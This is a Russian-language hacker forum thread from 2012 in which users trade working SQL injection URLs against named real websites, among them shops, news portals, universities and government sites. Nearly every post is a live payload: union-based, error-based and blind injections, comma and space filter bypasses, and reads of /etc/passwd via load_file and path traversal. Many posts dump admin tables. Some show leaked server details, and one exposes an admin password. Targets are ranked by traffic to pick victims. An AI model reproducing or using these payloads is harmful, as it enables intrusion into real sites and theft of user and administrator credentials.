http://ovoshhi.yomu.ru/index.php?URL=razdely.php&tip=-2+union+select+1,2,3,count(*),5,6,7,8,9,10,11+from +Polzovateli--
Картинки
http://www.coloring.me/coloring-pages.php
?id=-2318 union select id_col,nom_fichier_col,nom_fichier_mini_col,nom_co l,cat_col,sous_cat_col,mots_cles_col,aide_titre_co l,date_col,date_maj_col
from coloring.coloring --
Га-Ноцри
29.04.2012, 22:05
PHP:
http://tekedb.uw.hu/jatekosadat.php?jid=-1+union+select+1,concat_ws(0x03a,name,password),3, 4,5,6+from+users--
Картинг
http://www.tonykart.com/leggi_prodotto_en.php?ID_prodotto=774&ID_categoria=62&ID_macrocategoria=-3 union select 1,2,concat_ws(0x2e,nome_file),4 from allegati_comunicati --
Га-Ноцри
30.04.2012, 03:54
Я буду гореть в аду
PHP:
http://kolyaski-nn.ru/index.php?id=12&cat=18&podcat=47&pid=-567+union+select+1,2,3,4,5,6,7,8,9,10,11--
BLurpi^_^
30.04.2012, 16:35
ТИЦ 10
PHP:
http://www.afh.ru/product_d.php
?id=13/**/union/**/select/**/unhex(31303235343830303536),concat(0x27,unhex(Hex( cast(user()/**/as/**/char))),0x27),unhex(31303235343830303536),unhex(31 303235343830303536)--
Интересные скульи(обход фильтрации запятых). Эскорт-услуги.
Посещаемость 2.8k/day.
Code:
http://www.sexrelax.ru/girls.php?link=983+union+select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select 5)e join (select version())f--+f
Посещаемость мала, но есть шансы клиентов найти
Code:
http://www.spbdosug.com/girls.php?link=341+union+%0A+select*from(select+1) a+join+(select+2)b+join+(select+login+from+users+w here+id=1)c+join+(select+4)d+join+(select+5)e+join +(select+6)f+join+(select+7)g+join+(select+8)h+joi n+(select+9)k--+f
BLurpi^_^
30.04.2012, 17:43
ТИЦ 10
PHP:
http://www.detali52.ru/shop/i.php
?id=52011+union+select+version()--
вывод в редиректе:
http://featherfiles.aviary.com/2012-04-30/94101d3dd/cc302541f5a643279644b36313969740.png
Хоккей
http://www.caheathockey.com/team.php?id=-8 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x2e,table_schema,tabl e_name,column_name),11,12+from+information_schema. columns limit 280, 100 --
Soccer Club
http://www.iwsl.com/mapany.php?fld_id=-541 union select 1,2,concat_ws(0x2e,adl_id,adl_coa_id,adl_tea_id,ad l_type,adl_action,adl_is_xfer,adl_fee,adl_approved ,adl_lastmod),4,5,6,7,8,9,10 from adddroplog --
телепрограмма
http://www.we.com.mt/page.php?type=programme&id=-5%20union%20select%201,2,3,4,5,6,7,concat_ws%280x2 e,table_schema,table_name,column_name%29,9,10,11,1 2,13,14,15,16,17%20from+information_schema.columns %20limit%20400,1000%20--
//постите все вместе
AlexPage
01.05.2012, 03:31
Порнуха
Code:
http://boobzi.com/index.php?division_id=9999999999999999999+union+se lect+1,concat_ws(0x3a,version(),user(),database()) ,3,4,5,6--
5.1.40:boobzi@localhost:wwwboobzicom
Научный
http://www.esdelibro.es/index.php?id_seccion=7&id_contenido=-263 union select 1,2,concat_ws(0x2e,profesor)from diplomas --
Скачка
Code:
http://www.tegnet.com.ar/es/download.php?p_mirror_id=-25 union select 1,2,concat_ws(0x3a,version(),database(),user()),4, 5 --
Га-Ноцри
01.05.2012, 05:09
Для зорких глазом
HTML:
http://www.nugu.lt/dossier/main.php?mid=-215+union+select+1,user_login+from+wp_users--
ISC Intelligence in Science
http://www.iscintelligence.com/event.php?id=-5 union select 1,concat_ws(0x2e,seoDescripcionWeb,version()),3,4, 5,6,7,8,10,11,12,13 from datosempresa order by rand(1) --
AlexPage
01.05.2012, 13:02
http://www.theflea.org/
http://www.theflea.org/show_detail.php?page_type=0&show_id=-1+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6,7,8,9,10,11,12,13,14,15,16,17+f rom+flea_cms.calendar_admins--
5.0.51a-24+lenny5:fleadbuser@localhost:flea_cms
http://lavida.kgnu.net/
http://lavida.kgnu.net/lavidaradioshow.php?show_id=99999+UNION+SELECT+con cat_ws(0x3a,version(),user(),database()),2,3,4,5,6 ,7,8,9,10,11,12,13,14,15,16--
5.1.62-0ubuntu0.10.04.1:kgnu@localhost:lavida
http://www.projekt30.com/
http://www.projekt30.com/the_sex_issue_3.php?func=display&show_id=43&image=1&aid=9999999999+union+select+concat_ws(0x3a,version (),user(),database())--
4.1.22-logrojekt30@localhostrojekt30
PR: 5, тИЦ: 10
Вывод в исходнике. Мускуль 4 ветки, но есть таблица users с полями email и password
http://orac.caffeine.co.nz/
http://orac.caffeine.co.nz/shows/index.php?go=main.EditShow&show_id=9999999999999+union+select+1,2,unhex(hex(c oncat_ws(0x3a,version(),user(),database()))),4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33--
4.1.12:tim@localhost:guideData
druart-sa
http://www.druart-sa.be/en/index.php?id_texte=-1 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user ()),7--
Лошади
http://www.dyon.be/produits_details_briderie.php?Id_produit=159&Id_cat=11&Id_lang=2&Id_ss_cat=14&Id_sss_cat=-40 union select 1,concat_ws(0x3a,login,pw),3,4,5,6 from admin--
cartoon
http://www.cartoon-media.be/CONNECT/con_index.php?id=-6 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),us er()),8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8, 9,10,1,2,3,4,5,6,7,8--
Га-Ноцри
01.05.2012, 20:18
Что-то непонятное на польском.
PHP:
http://www.book2u.mielec.pl/dossier-k-,p,6015?id=9999999'+union+select+concat_ws(0x03a,@ @datadir,@@tmpdir)--+h
Ферма
http://www.marcdecock.com/page.php?id=-2 union select concat_ws(0x2a,File_priv) from mysql.user --
Га-Ноцри
01.05.2012, 20:53
Читаем немецкие новости.
PHP:
http://top-nachrichten-24.com/content/ransicht.php?rid=-16+union+select+1,concat_ws(0x03a,id,login,passwor d,level),3,4+from+user_admin--
Ток не вывести (
http://www.bozar.be/activity.php?id=11108 union select null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null--
Га-Ноцри
01.05.2012, 21:29
ТИЦ = 10, PR = 5
PHP:
http://www.editorialalmuzara.com/editorial.php?idioma=1&dossier=999999999+union+select+1,concat_ws(0x03a,d atabase(),user(),version()),3,4,5,6,7,8--
Часы
http://ice-watch.com/store.php?id=-18862 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x2e,ftpuser.users.pas swd,ftpuser.users.homedir),1,2,3,4,5,6,7,8,9,10,1, 2,3,4,5,6 from ftpuser.users --
Га-Ноцри
01.05.2012, 22:31
Error-based.
PHP:
http://amou.lebasket.net/com/album.php?Dossier=soiree_sponsors&lang=f+and(select+1+from(select+count(*),concat((s elect+(select+concat(database()))+from+`informatio n_schema`.tables+limit+0,1),floor(rand(0)*2))x+fro m+`information_schema`.tables+group+by+x)a)+and+1= 1
Телефоны
http://vai.ai/eventotefvivo2011/cartao.php?id=-2 union select 1,2,concat_ws(0x2e,User,Password),4,5 from mysql.user --
Га-Ноцри
02.05.2012, 06:28
Буква "N" латинского алфавита довольно часто делает меня грустным
PHP:
http://www.solvimo.com/definition3.php?num=-62+union+select+1,2,file_priv+from+mysql.user--
все выдает
http://www.garatgenogreda.ad/catalog/shopping/product_details.php?id=63 order by union select p.id,p.name,p.description,p.price,p.km,p.year,p.eq uip,p.on_special,p.image1,p.image2,p.image3,pc.cat egory_id from categories --
http://www.montmantell.com/index.php?accion=itinerari&idmenu=2&id=-12 union select 1,2,3,4,5,6,7,concat_ws(0x3a,version(),database(), user()),9,10,1,2,3,4,5,6,7,8,9,10,1--
Га-Ноцри
02.05.2012, 21:21
Коллекционерам юзеров.
PHP:
http://www.super-ethanol.fr/index.php?page=kit_e85-detail&dossier=pages&id=-48+union+select+1,2,count(*),4,5,6,7,8,9,10,11+fro m+phpbb3_users--
Батарее
http://bgsolarpanels.com/products.php?lg=en&id=1 union select 1,2,3,4,5,concat_ws(0x2e,users.Username )from bgsolarp_db.users --
Га-Ноцри
03.05.2012, 02:43
Админка на французском. Лень ковыряться.
PHP:
http://www.diocesebafoussam.org/index.php?section=26&elt=114&dossier=-7+union+select+1,concat_ws(0x03a,id,login,password ,role),3,4,5+from+users--
winstrool
03.05.2012, 19:12
Учитесь на кошках))
http://confederation-art.ru/ru/index.php?p1=unions&uniid=-8+union+select+1,(select(@x)from(select(@x:=0x00), (select(0)from(information_schema.columns)where(ta ble_schema!=0x696e666f726d6174696f6e5f736368656d61 )and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema ,0x2e,table_name,0x3a,column_name))))x),3+--+
http://www.svadba-chelny.ru/index.php?p1=4&p2=26&p3=97+union+select+1,(select(@x)from(select(@x:=0x 00),(select(0)from(information_schema.columns)wher e(table_schema!=0x696e666f726d6174696f6e5f73636865 6d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_sc hema,0x2e,table_name,0x3a,column_name))))x),3,4,5+--+
http://www.domnus.org/index.php?item_id=-4999999999999+and+1=1+union+select+1,2,3,4,5,(sele ct(@x)from(select(@x:=0x00),(select(0)from(informa tion_schema.columns)where(table_schema!=0x696e666f 726d6174696f6e5f736368656d61)and(0x00)in(@x:=conca t(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a, column_name))))x),7,8,9,0,11+--+
http://epidavr.ru/?ITEM_ID=2291+UnIon+selECt+1,(select(@x)from(selec t(@x:=0x00),(select(0)from(information_schema.colu mns)where(table_schema!=0x696e666f726d6174696f6e5f 736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e, table_schema,0x2e,table_name,0x3a,column_name))))x ),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
Consulting
http://www.bficonsulting.com/index.php?id=78 union select 1,2,3,4--
Спорт
http://www.morini.ch/gal.php?evt=115 union select 1,2,3,4,5--
агентство
http://data.unhcr.org/SouthSudan/partner.php?OrgId=-80 union select 1,2,3,concat_ws(0x3a,CountryCode,Id),5,6,7,8,9,0,1 ,2,3,4,5,6,7,8,9,0 from codecountry limit 1,1 --
Га-Ноцри
04.05.2012, 01:20
Просто сайт. Ничего интересного.
PHP:
http://www.asdlionheart.com/links.php?idSection=-84+union+selec+1,count(*),3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+u sers--
magyarugar
http://magyarugar.com/cikk.php?id=-13158 union select 1,concat_ws(0x2e,cou,name),3,4,5,6,7,8,9,0,1,2,3,4 ,5,6,7,8,9,0 from countrycodes --
Drupal some one
http://www.compudrug.com/print.php?id=-13 union select 1,2,3,concat_ws(0x2e,name,pass),5 from users--
Га-Ноцри
04.05.2012, 07:01
И снова ничего интересного
PHP:
http://oldriver.ru/Page.php?PID=-29+union+select+1,@@datadir,3--
http://www.novocherkassk-gorod.ru/cgi-bin/News/news1.cgi?id=17132%20and%201=2%20union%20select%20 1,2,concat_ws(char(58),@@version,user(),database() ,@@version_compile_os),4,5,6,7,8+--
5.0.90-log u54156@10.8.0.115 u54156 portbld-freebsd7.3
culminatum
http://www.culminatum.fi/en/sivu.php?id=3&uid=-91 union select 1,concat_ws(0x3a,version(),database(),user()),3,4, 5,6,7,8,9 --
Самолеты
http://www.almt.fi/index.php?tid=38 union select 1,2,3,4,5,6,7--
хз как вывести
Хз что
http://weppi.gtk.fi/publ/foregsatlas/article2.php?id=-28 union select 1,2,3,concat_ws(0x2e,geochemical_atlas.articles.id ,geochemical_atlas.articles.title),5,67,8 from geochemical_atlas.articles --
Га-Ноцри
04.05.2012, 19:50
Что-то типа шопа.
PHP:
http://toptrail.com.au/catalog.php?catId=-6+union+select+1,concat_ws(0x03a,id,login_id,passw ord),3,4+from+admin--
Cennarios
04.05.2012, 20:32
Но комментс:
http://www.topnews.ru/citation.php?autor=111134+union+select+1,2,3,4,gro up_concat(table_name),6,7,8+from+information_schem a.columns+where+column_name+like+'%pass%'--+&prof=0&page=1
BLurpi^_^
04.05.2012, 23:58
Антивирусы то предоставляют, а сами себя защитить не могут
PHP:
http://www.comvirus.ru/index_a.php ?id_at=-1+UNION+SELECT+version(),2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20--
http://featherfiles.aviary.com/2012-05-04/94101d3dd/d30af3e5c653496fa560136e65209f87.png
PHP:
http://megaresort.ru/view_a.php?id=-21+union+select+1,group_concat%280x5F,user%28%29,0 x5F,version%28%29,0x5F%29,3,4,5,6--
PHP:
http://www.miamacdonald.com/a.php?id=42/**/union/**/select/**/1,version%28%29,3,4,5,6--
фильтруются " " и "+"
Га-Ноцри
05.05.2012, 02:23
Привет Питеру. Как там у вас погодка?
PHP:
http://hck2.ru/index.php?page=2&newsid=-310+union+select+concat_ws(0x03a,id_user,u_name,u_ pass,type)+from+k2new_users--
http://adminsoskov.57ru.ru/news_view.php?id=-77+union+select+1,version()
PR=5
4.1.22-standard
trololoman96
05.05.2012, 12:18
Code:
http://www.begemotdecals.ru/shownews.php?lang=1&id=-56+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9
http://www.any-mp3.ru/mods/download/fid=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9
http://www.diplom-ref.ru/category.php?category=%C1%E8%F0%E6%E5%E2%EE%E5%20% E4%E5%EB%EE'+and+5=4+union+select+1,concat_ws(0x3a ,user(),database(),version()),3,4--+
http://www.megatec.ru/?m=97'+and(select+1+from(select+count(*),concat((s elect+concat_ws(0x3a,username,password)+from+login +limit+0,1),0x3a,floor(rand(0)*2))x+from+informati on_schema.tables+group+by+x)a)--+
http://mvairport.ru/article.php?id_article=-52+union+select+1,2,3,4,user%28%29,6,7,8,9,10,11,1 2,13-- вывод в дескрипшен
http://www.geneticsandsociety.org/article.php?id=305+and+5=4+union+select+version%28 %29
http://www.nissi-beach.com/section.php?id=13+or+1+group+by+concat%28%28select +version%28%29%29,floor%28rand%280%29*2%29%29havin g+min%280%29+or+1--+
http://www.script-php.info/index.php?link=9&id=-41+union+select+1,2,3,4,5,6,7,8,version%28%29,10--
http://artdiana.ru/souvenir_simvol' and substring(version(),1,1)=5-- f
http://refunc.nl/index2.php?id=-79 UNION SELECT 1,2,3,4,5,6,7,8,group_concat(user()),10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25--
PR [4]
PHP:
http://www.wcfls.org/news.php?ID=-95+union+select+1,2,3,group_concat(user_ID,0x03a,u ser_name,0x03a,user_pass),5,6,7,8,9+from+member_us ers--
PR=5
Га-Ноцри
05.05.2012, 23:38
Что-то на итальянском.
PHP:
http://www.deabusiness.it/news.php?newsid=-22+union+select+1,2,count(*)+from+utenti--
polit-nn.ru
PHP:
http://www.polit-nn.ru/?pt=comments&view=single&id=946+or+1+group+by+concat%28%28select+version%28 %29%29,0x00,floor%28rand%280%29*2%29%29having+min% 280%29+or+1--+
5.1.61-log
Яндекс тИЦ (CY) 450
Alexa Rank 926,577 +164,188
Google PageRank (PR) 4
----------------------------------------------------------------------------------
moi-kotenok.ru
PHP:
http://www.moi-kotenok.ru/view_news.php?id=78%27+limit+0,0+union+select+1,2, 3,4,5,6,7,8,9,version%28%29,11--+
5.1.61-0+squeeze1-log
Яндекс тИЦ (CY) 70
Alexa Rank 437,859 -160,004
Google PageRank (PR) 2
---------------------------------------------------------------------------------
pspp-pmr.biz
PHP:
http://pspp-pmr.biz/news_f.php?id=227+or+1+group+by+concat%28%28select +version%28%29%29,0x00,floor%28rand%280%29*2%29%29 having+min%280%29+or+1--+
5.0.67-log
Яндекс тИЦ (CY) 0
Alexa Rank 28,109,564
Google PageRank (PR) 0
---------------------------------------------------------------------------------
box50.ru
PHP:
http://box50.ru/index.php?id=15755%27+limit+0,0+union+select+1,2,3 ,4,5,6,7,8,9,10,11,12,13,14,version%28%29--+
5.0.92-log
Яндекс тИЦ (CY) 0
Alexa Rank 11,821,637
Google PageRank (PR) 0
----------------------------------------------------------------------------------
sochland.ru
PHP:
http://sochland.ru/sub3/?id=9+or+1+group+by+concat%28%28select+version%28% 29%29,0x00,floor%28rand%280%29*2%29%29having+min%2 80%29+or+1--+
5.1.35-community-log
Яндекс тИЦ (CY) 10
Alexa Rank 1,973,983 +634,647
Google PageRank (PR) 0
-----------------------------------------------------------------------------------
2hp.com.ua
PHP:
http://2hp.com.ua/m/news-item.php?id=225+limit+0,0+union+select+1,2,3,4,5,6 ,7,8,9,version%28%29,11,12,13,14,15,16,17,18,19,20--+
5.0.77-log
Яндекс тИЦ (CY) 0
Alexa Rank 4,286,031
Google PageRank (PR) 2
-----------------------------------------------------------------------------------
teatrum.ru
PHP:
http://www.teatrum.ru/best.php?id=173+limit+0,0+union+select+1,2,3,versi on%28%29,5,6,7,8,9,10,11,12,13--+
5.0.51a-24+lenny2+spu1-log
Яндекс тИЦ (CY) 20
Alexa Rank 13,780,078 +7,104,892
Google PageRank (PR) 1
http://www.voltyre-prom.ru/img/logo.gif
http://www.voltyre-prom.ru/arhiv.php?type=-4%20and%201=2%20union%20select%201,concat_ws(0x3a, @@version,user(),database(),@@version_compile_os), 3,4,5,6,7,8+--
4.1.24-log voltyre2006_base@77.221.130.11 voltyre2006_base unknown-linux-gnu
Га-Ноцри
06.05.2012, 23:19
Питерский ВУЗ. PR=3
PHP:
http://www.ti-studpk.ru/rubrics.php?id_menu=2&id_r=-15+union+select+1,2,3,count(*),5,6+from+users--
Code:
http://www.ticketcrociere.it/popup.php?travel_id=MD11101020&id=-3357+union+select+concat_ws%280x3a,user%28%29,vers ion%28%29,database%28%29%29--
Исходник:
Username: ticket2k9@ticket.village.it
Version: 5.0.32-Debian_7etch8
Database: viaggi2008
GooglePR: 4
Га-Ноцри
07.05.2012, 02:45
ТИЦ == 250, PR == 4, ЯК == true;
PHP:
http://www.pakwerk.ru/pages/catalog/komponenty-termoupakovochnogo-oborudovaniya.php?iid=-274+union+select+1,2,3,4,5,concat_ws(0x03a,ID,Logi n,Password)+from+std_users--
PHP:
http://my-corp.ru/page.php?id=-9+and+1=0+union+select+1,2,3,4,5,6,group_concat%28 0x3a,user%28%29,0x3a,version%28%29,0x3a%29,8,9,10, 11,12+--+
5.5.15-log
nemaniak
07.05.2012, 15:25
musictownclub.ru ТИЦ-190
Code:
www.musictownclub.ru/view_news.php?news=-432+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),user(),database()),7,8,9,10,11,12,13,14,15--
Code:
5.1.44:musictc_ru@localhost:musictc_ru
mxm.ru ТИЦ-100
Code:
www.mxm.ru/oxota/index.php?parent_id=-7349+union+all+select+1,2,3,concat_ws(0x3a,version (),user(),database()),5,6,7,8,9,0,11,12,13,14,15%2 3
Code:
4.0.27:root@zvm32.host.ru:mxm
cloud2020
07.05.2012, 17:47
Code:
http://bajuncat.ru/ViewPhoto.php?Id=29'
Га-Ноцри
07.05.2012, 21:24
Решив эту несложную загадку, вы найдете самую брутально-спартанскую админку из виденных мною.
PHP:
http://www.asvip.ru/index.php?section=-118+union+select+@@version_compile_os,2,3,4,5,6,7--
cloud2020
08.05.2012, 03:40
Code:
http://www.beemabuild.co.uk/view_product.php?id=258'
Админку найти не могу.
вот данные админа:
admin:005zavBQL
Га-Ноцри
08.05.2012, 15:30
Ничего интересного.
PHP:
http://cotton-shop.ru/site.php?p=2&cat=-56'+union++select+1,2,@@version_compile_os,4,5,6,7--+h
razvlekaykaa.ru
PHP:
http://razvlekaykaa.ru/index.php?option=com_bca-rss-syndicator&c ontroller=../../../../../../../etc/p asswd%00
addr.ru
PHP:
http://addr.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,concat_ws%280x3a,u sername,p assword,usertyp e,activation%29,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0, 0,0,0%20from%20jos_users--
PHP:
http://www.scotclimb.org.uk/books/review.php?id=-33013+union+select+1,2,g roup_concat%28name,0x3 a,pa ssword,0x3a,email%29,4,5,6,7,8,9,10,11,12,13 ,14+fr om+climbers--
nemaniak
09.05.2012, 01:19
t-s-c.ru ТИЦ-400 blind
Code:
www.t-s-c.ru/catalog.php?parent_id=217'+AND+5=substring(version (),1,1)+AND+'Wybq'='Wybq
Code:
www.t-s-c.ru/catalog.php?parent_id=217'+AND+4=substring(version (),1,1)+AND+'Wybq'='Wybq
Code:
5.0.77:script@localhost:hitachi-tsk
allcharter.ru ТИЦ-150 ~1к уников
Code:
www.allcharter.ru/showfirm.php?num=-140'+UnIon+selECt+1,concat_ws(version(),user(),dat abase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 ,36,37,38+--+
Code:
srv8057_allchart@c9-w.ht-systems.ru5.0.33srv8057_allcharter
интерприбор.рф ТИЦ-190
Code:
интерприбор.рф/faq.php?id=-17'+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8,9,0,11,12,13,14,15,16+--+
Code:
5.0.45:interprbr@localhost:interprbr
Игрушки
http://www.hobbytech-rc.com/car.php?id=-160 union select 1,2,3,4,5,6,7,concat_ws(0x2e,imodelprhobby.car_ima ge.id),9 from imodelprhobby.car_image--
Га-Ноцри
09.05.2012, 03:19
Ну, раз сегодня такая активность ближе к ночи, то тоже поддержу господ, отписавшихся выше
PHP:
http://www.golflab.spb.ru/index.php?mid=10&pid=-24+union+select+':)',':)'--
Читалка столбцы
http://www.freetv.fr/tv.php?id=-13 union select 1,2,3,4,5,concat_ws(0x2e,freetvsql.chaines.id,free tvsql.chaines.url,freetvsql.chaines.id_texte),7,8, 9,0,1,2 from freetvsql.chaines --
http://www.bagster.com/en/showroom.php?id=-106 union select 1,concat_ws(0x3a,version(),database(),load_file(0x 2f6574632f706173737764)),3,4,5,6,7,8,9,10--
http://www.clinique-yvette.com/pages/fiche-info.php?id=5&dep=7 union select 1,2,concat_ws(0x2e,yvette.yv_FicheMaster.fma_intit ule,yvette.yv_FicheMaster.fma_contenu),4 from yv_FicheMaster limit 1,1--
Га-Ноцри
09.05.2012, 05:03
Пройдемся по error-based, в таком случае.
PHP:
http://aw-o.com/item.php?pid=15&lang=rus+and(select+1+from(select+count(*),concat( (select+(select+(select+distinct+schema_name+from+ `information_schema`.schemata+limit+1,1))+from+`in formation_schema`.tables+limit+0,1),floor(rand(0)* 2))x+from+`information_schema`.tables+group+by+x)a )+and+1=1--
Вывод:
PHP:
Duplicate entry'awocom1'forkey 1)
BLurpi^_^
09.05.2012, 06:47
PHP:
http://kif-auto.ru/modules/view_a.php?id=-3'+and+1=0+union+select+1,version(),3,4,5,6,7,8+--+
PHP:
http://www.jcmi.ca/events/event.php?id=-1+union+select+1,2,3,4,5,6,7,g roup_concat%28user name,0x3a,pa ssword%29,9,10,11,12,13,14,15, 16 ,17,18+from+jcUsers--
http://www.ciaproperties.co.za/prop001.php?id=-225+union+select+1,2,3,g roup_concat%28txtuser, txtp assworde%29,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23, 24,25,26,27+from+tbluser--
communicat.pk
пароли в открытом виде
PHP:
http://www.communicat.pk/web/market_map.php?id=-4+union+select+1,g roup_concat%28table_name%29, 3,4,5,6,7,8+from+information_schema.tables+w he re+t able_schema=CHAR%2867,%2079,%2077,%2077,%2 085,%2078,%2073,%2049,%2095,%2067,%2065,%2084%29--
ousa.ca
PHP:
http://ousa.ca/educatedvoice/page.php?id=57+AND+1=2+U NION+S ELECT+1,2,0x494e 432e,4--
mysql:Gov
Code:
http://www.bogota.gov.co/equidad/newequi.php?id=%27
http://www.tsgaj.gov.cn/pluger/pingjia/index.php?act=frame&type=jws&id=6%27
http://xz.luanxian.tsgaj.gov.cn/show.php?id=5574%27
http://www.nbyzrc.gov.cn/homepage2/subview.php?id=1818
http://www.yatsen.gov.tw/chinese/lesson/show.php?id=4&PHPSESSID=
http://tccip.hach.gov.tw/tccp/main?page=temp_01_detail&id=26%27
http://sun.yatsen.gov.tw/hero_detail.php?id=%27
mysql:UK
Code:
http://www.bepropertyservices.co.uk/sales_fulldetails.php?id=2004583
http://www.b-r.co.uk/sales_fulldetails?id=300216567
http://cankay.org.uk/popup.php?class=stretches&act=displayStretchInfo&id=63
http://www.idbaza.co.uk/details.php?pid=48&lan=en
http://www.citrixchanneltraining.co.uk/ev.php?pg=ev&id=%27,ID,%27&sid=
http://www.atkinsonkeene.co.uk/sales_fulldetails.php?id=1578035
http://www.id-eclectic.co.uk/bluadmin/get_cart_info.php
http://www.kapitol.co.uk/index.php?id=11CachedYou
http://www.enidblytonsociety.co.uk/book-details.php?id=637andtitle=Tales+After+Supper
http://apollolettings.co.uk/propertydtl.php?id=%2749%27
http://www.managingdiversity.co.uk/news_archive_list_articles.php?ID='
http://www.ctgltd.co.uk/news.php?id=70&title=CTG+TORQLine+equipped+Impreza+fastest+in+the +world
http://www.shadow-world.co.uk/modules/profile_1.2/index.php?doing=viewProfile
mysql:MX
Code:
www.euromaquinas.com.mx/detallesescoplos.php?cod='
http://www.anemonaqro.com.mx/fabricantes.php
www.imagendeveracruz.com.mx/vercolumna.php?id='
http://www.mexmicro.com.mx/catalogo.php?id=135
http://mexicolegal.com.mx/oficina/index.php?id=3905
http://www.novenet.com.mx/seccion.php?id=209994&sec=&d=07&m=06&y=2011
http://www.impuestum.com.mx/noticias/5.html?PHPSESSID=%27
http://www.ccs.net.mx/contenido.php?id=2763
http://redu.org.mx/vernoticia.php?noticiaid=111
http://estudio5.com.mx/fabricantes.php
PHP:
http://www.cdneza.gob.mx/index.php?id=galerias&cve=51+A ND+1=0+U NION+S ELECT+0
mysql:FM
Code:
http://www.aukcje.fm/show_user.php?id=8163&type=give
http://www.blu.fm/subsites/partypix/index.php?s=partypix&a=ecard&i=1&id=712
http://edura.fm/#!/radiogruppe/beitraege.php?gr_id=54&g_id=&g_player=off&g_lang=de&id=54&select=neuste&u_id=&au_id=0&d_id=
mysql:EU
Code:
http://www.gluchowski.eu/pl/index.php?url=galeria&akcja=inne&opcja=pokazgal&id=4&gal=2&tytul=Zdj%C4%99cia%20z%202005
https://ekash.eu/index.php/agentsworldwide
http://gyg4u.eu/index.php?id=92
http://www.sweethanol.eu/art.php?id=14
http://www.paukova-mreza.eu/index.php?task=view&id=276
http://www.sociologiapadova.eu/?pagina=pagina_generica.php&id=2..
http://www.wawerek.eu/articles.php?id=00
http://www.paukova-mreza.eu/index.php?task=view&id=276
http://www.sgelectronics.eu/contact.php
http://humanconcept.eu/ajanlatok_bovebb.php?id=29
http://www.badalini.eu/home_it.php?azione=scheda_prodotto_it&id=51
http://www.impolex.eu/index.php?PHPSESSID=&akcja=01&id=3
CO.IL
PHP:
www.ift.co.il/showPage.asp?id=26+union+select+1,username,3,4+fro m+admins
http://www.ift.co.il/showPage.asp?id=26+union+select+1,password,3,4+fro m+admins
http://www.ohv.co.il/asp/portfolio_company.asp?id=117%20union%20select%201, 2,u name,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18 ,19,20,21,22%20from%20a dmin
http://www.raz-pi.co.il/pages.php?id=-9+union+select+0,us ername,pa ssword+from+admins
http://www.isratim.co.il/archive/2008/details.php?id=-155+UNION+SELECT+1,group_concat%28login,0x3a,pa ssword,0x3a,a dmin%29,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28 ,29+from+userkeys
http://dandd.co.il/video.asp?id=3+union+select+1,u sername,pa ssw ord,4, 5,6,7+from+admin
http://www.yadal.co.il/Contents/details.asp?id=662+union+select+1,2,3,4,5,u ser name,7,8,9,10,pa ssword,12,13,14, 15,16,17+fro m+admins
SQL Injection:Co-operative Urban Bank
Code:
http://www.ferokebank.in/news.php?id=1
Tables found: fcub_logs,fcub_newsboard3,fcub_user,fcub_user_logs
Га-Ноцри
09.05.2012, 22:54
Вопросы-ответы по ремонту и строительству.
ТИЦ == 30, PR ==3;
PHP:
http://www.remotvet.ru/index.php?catID=-205+union+select+count(*)+from+users--
onlymelbourne
http://www.onlymelbourne.com.au/melbourne_details.php?id=-9408%20union%20select%201,2,3,4,5,6,concat_ws%280x 2e,table_schema,table_name,column_name,load_file%2 80x2f6574632f706173737764%29%29,8,9,0,1,2,3,4,5,6, 7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5%20 from%20information_schema.columns%20where%20table_ name=0x656d61696c73%20limit%204,1%20--
Га-Ноцри
10.05.2012, 06:02
Новостной портал.
ТИЦ == 230, PR == 4, DMOZ == true;
PHP:
http://tvkrasnodar.ru/news/?id=7777777'+union+select+1,2,3,4,5,6,7,8,9,10+--+h
kobaltt
http://www.kobaltt.ae/offre_detail.php?id_offre=-4466 union select 1,2,concat_ws(0x2e,kobalttae.agents.id_qualif,koba lttae.agents.mot),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9, 0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 from kobalttae.agents --
http://commvehicles.com/cvmeprofile.php?id=-142 union select 1,2,concat_ws(0x3a,version(),database(),user()),4, 5,6,7,8,9 --
Га-Ноцри
10.05.2012, 09:01
PR == 3
PHP:
http://www.mir-sekretov.ru/detailNews.php?newsID=-4+union+select+1,2,@@datadir,@@tmpdir,5,6,7,8--
PR == 1 и мерзкие рожи
PHP:
http://www.vivadisco.ru/en/index.php?newsid=-17+union+select+1,2,3,4,concat_ws(0x03a,user(),dat abase(),version()),6,7--
ТИЦ ==10 PR ==3 и error-based
PHP:
